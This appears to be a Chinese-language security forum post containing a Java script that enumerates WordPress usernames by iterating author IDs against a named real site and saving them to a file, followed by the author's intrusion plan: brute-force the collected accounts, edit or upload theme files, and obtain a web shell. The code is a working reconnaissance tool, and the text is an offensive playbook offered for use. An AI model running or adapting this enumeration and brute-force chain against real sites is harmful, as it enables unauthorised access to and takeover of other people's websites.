先贴下我的抓取wordpress 用户脚本
import java.io.BufferedReader; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.InputStreamReader; import java.net.URL; /** * WordpressGetUser * Group 类 用于匹配和抓取 html 页面的数据 * @author itleaf - http://blog.itleaf.info */ public class wpUserCollection { public static void main(String[] args) { int set=1116 ;//设定循环次数 int i=1; //for循环获得所有用户 for(i=1;i<=set;i++){ String strUrl = "http://drops.wooyun.org/?author="+i; try { URL url = new URL(strUrl); InputStreamReader isr = new InputStreamReader(url.openStream(),"utf-8"); // 统一使用utf-8 编码模式 // 使用 BufferedReader 来读取 InputStreamReader 转换成的字符 BufferedReader br = new BufferedReader(isr); String strRead = ""; // 新增一个空字符串strRead来装载 BufferedReader 读取到的内容 // 定义正则 用于匹配我们需要的数据 String regularUser = ">[^<>]*</title>"; // 创建一个GroupMethod类的对象 gMethod 方便后期调用其类里的 regularGroup方法 GroupMethod gMethod = new GroupMethod(); while ((strRead = br.readLine()) != null) { /** * 用于获取用户名 */ String strGet = gMethod.regularGroup(regularUser, strRead); if (!strGet.equals("")) { //这里同样用到了substring方法 来剔除'<' 和 "</a>" 标签 来获取我们想要结果 strGet = strGet.substring(1, strGet.indexOf(" ")); File file = new File("e://wpUser.txt"); FileWriter out =new FileWriter(file, true); out.write(strGet+"\r\n");//追加换行保存到 out.close(); System.out.println(strGet); } } br.close(); // 读取完成后关闭读取器 } catch (IOException e) { System.out.println("出错了,没有此用户!"); } } } } import java.util.regex.Matcher; import java.util.regex.Pattern; public class GroupMethod { // 传入2个字符串参数 一个是pattern(我们使用的正则) 另一个matcher是html源代码 public String regularGroup(String pattern, String matcher) { Pattern p = Pattern.compile(pattern, Pattern.CASE_INSENSITIVE); Matcher m = p.matcher(matcher); if (m.find()) { // 如果读到 return m.group();// 返回捕获的数据 } else { return ""; // 否则返回一个空字符串 } } }
在没0day的情况下我的思路只有是搜集用户——爆破——爆破成功——改主题文件/上传主题包等——shell
不过有时会遇到/wp-admin/目录ip访问限制,bae、sae等环境就麻烦了~
不过在管理者跟编辑的权限下是可以贴script等标签的(如:评论框,target.com/wp-login.php即可登录,无法访问后台),之后我就不知到怎么玩了~
查看更多关于WordPress博客入侵检测技巧 - 网站安全 - 自学php的详细内容...